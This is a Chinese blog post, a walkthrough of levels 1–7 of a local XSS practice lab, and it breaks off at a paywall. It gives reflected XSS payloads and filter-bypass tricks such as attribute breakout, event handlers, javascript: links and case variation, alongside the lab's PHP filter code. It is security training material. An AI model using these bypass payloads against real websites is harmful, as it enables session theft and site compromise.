xss靶场练习

最新推荐文章于 2024-09-01 21:11:26 发布
原创 最新推荐文章于 2024-09-01 21:11:26 发布 · 306 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss #前端

本文详细介绍了在XSS靶场中从Pass-1到Pass-16的各种过滤和绕过策略,包括利用单引号、事件触发、大小写绕过、cookie注入以及ng-include等方法进行攻击。通过审查元素和理解代码过滤机制,逐步揭示了如何在不同层级的防护下成功触发XSS漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

- Pass-1

127.0.0.1/xss/level1.php?name=<script>alert(1)</script>

在这里插入图片描述
通过
- Pass-2
直接插入不行,引号将其包裹起了
在这里插入图片描述

http://127.0.0.1/xss/level2.php?keyword="><script>alert(1)</script><--

在这里插入图片描述
- Pass-3
审查元素看看
在这里插入图片描述
看似和2没啥区别 但与level2不同的是,value做了校验,双引号和尖括号都被校验了
可以集合单引号和事件来触发

‘ onclick='alert(1)

在这里插入图片描述

- Pass-4
在这里插入图片描述
可以看到对< >进行了过滤
由下图可以看出是双引号包裹得
在这里插入图片描述

" οnclick="alert(1)"

在这里插入图片描述
- Pass-5
在这里插入图片描述
对script进行了过滤
看了下还是双引号包裹

过滤了

" οnclick="alert(1)"

在这里插入图片描述
看手源码
在这里插入图片描述

"><a href='javascript:alert(1)'>

在这里插入图片描述
- Pass-6
过滤

$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);

可大小写绕过

"><Script>alert(1)</script>

在这里插入图片描述
- Pass-7

ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace
最低0.47元/天 解锁文章
网络安全之xss靶场练习
bb_lo的博客
08-18 1357
靶场地址页面显示如下。
网络安全之XSS靶场
huizhaohaha的博客
08-18 1495
可以看到,我们通过url传递参数,传递了两个,一个src =1,一个onerror,最后保留下来了onerror参数,那这是什么原理呢,我们可以根据这个进行猜测,那就是,在这个循环删除完第一个参数的时候,指针网第二个参数走,但是由于,第一个参数没有数据了,我的传递的第二个参数向前走了一步,也就是到达了第一个参数的位置,而现在指针指的位置为空了,删不删的无所谓了,那么依据我们的分析,我们传递的参数可以保留偶数的参数,奇数参数都将会被删除,那么我们可以试一试看看我们的猜测是否正确。
XSS靶场练习
zlloveyouforever的博客
04-30 894
XSS-labs靶场练习前十关 很详细的哦
XSS练习
ahu0076的博客
05-02 165
1. XSS (Reflected) Low level 最基本的测试,在input框中输入 <script>alert(1)</script>页面出现下面的效果 出现我们期望的结果 说明存在xss反射型漏洞 2. XSS (Reflected) medium level 同样用上面的方法测试 发现页面并没有出现预想的结...
XSS练习(皮卡湫+XSS-labs+Burpsuit靶场
最新发布
weixin_64936150的博客
09-01 1675
发现我们的输入被传入到了href中,绑定给了what do you see,先试一下能不能直接给他闭合了。发现传入的参数一直被包裹,可能有符号被转义了,丢几个常见的闭合个上去看看闭合方式。这关我们登录进来后发现了输入框,还是直接尝试看能否弹窗,发现可以直接xss。测试发现双引号闭合,传入的值仍然在input中,再试一下上一题用到的事件。各种方法都尝试过了,都不可行,看源码发现判断了输入中有没有http://发现全加了下划线,大小写也无法绕过,那就只能看看加密能不能被解析了。
xss靶场练习xss.haozi.me解析及答案
lyz_yyds107的博客
08-05 1301
靶场绕过
反射型 xss靶场练习
09-27
在反射型XSS靶场练习中,可以使用以下步骤来进行练习: 1. 首先,找到一个含有反射型XSS漏洞的目标网站。 2. 在目标网站的输入框或URL参数中插入恶意代码,例如<script>alert("XSS")。 3. 提交输入或发送包含恶意...
XSS靶场练习记录
weixin_54225453的博客
07-29 228
alert(1)
XSS练习平台
07-17
XSS练习平台、XSS练习平台XSS练习平台XSS练习平台XSS练习平台XSS练习平台
反射型XSS靶场练习
qq_58000413的博客
09-25 1215
DVWA靶场第一关:low 直接一条alert(1)看看结果,很简单直接过关 第二关:Medium 继续接着一条alert(1)看结果,没有弹窗,接着我们看下源码 看到前端源码后,发现好像给过滤了,这时候我们需要考虑下为什么过滤 这时我们可以尝试下是不是因为这个组合导致的,不出意外应该是的 这时候我们可以尝试没有的payload,或者将通过大小写绕过alert(
自建靶场 XSS练习(一)
fanxiaoyao1的博客
03-01 1034
自建靶场 XSS练习(一) 点击链接快速跳到指定关卡 文章目录自建靶场 XSS练习(一)靶场搭建一、第一关二、第二关三、第三关四、第四关五、第五关六、第六关七、第七关七、第八关九、第九关 靶场搭建 我用的是phpStudy,靶场代码可以去github上找,或者私信问我要 浏览器用的火狐,有hackbar插件,谁用谁知道 一、第一关 点击进入第一关 这关没啥难度,简单粗暴,后台也没有过滤。name=<script>alert(/xss/)</script>就过了,当然你想玩
XSS练习
留得半世听茶香的博客
03-05 417
文章转载自:https://blog.csdn.net/Ni9htMar3/article/details/77938899 ...
Xss练习(level1-10)
AmyBaby00的博客
09-04 689
Xss练习 找输入点,输出点,能往页面上写东西,写的东西可以反馈出来。例如:搜索框 “ ”双引号包裹,会被网页源代码 当作普通的字符串。不是代码执行 尖括号成对出现,闭合<> (Xss防护:就是把有危险的词组屏蔽掉) level1 找输入点:在url里面可以看到name=test,只需构造一个基本的语句,执行该语句即name=”这里就是先把input内的双引号和尖括号闭合,然后再写我们...
xss靶场练习(二)之xss小游戏
angry_program的博客
02-13 2985
前言 话说自从网络安全修正法推出, 不敢轻易动国内的网站, 平时就打打靶场, 本文记录练习之路。 xss小游戏在线地址:http://test.ctf8.com/ xss小游戏一共二十关。 为了方便, 我把项目copy在本地。 为了方便实战效果和理解, 本文采用先通关再展示源码的排版方式。 Leve-1 有一个参数name: 再看看name在html源...
xss前十二关靶场练习
weixin_62870380的博客
09-02 1046
xss漏洞原理,分类,以及xss漏洞靶场前十二关通关。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值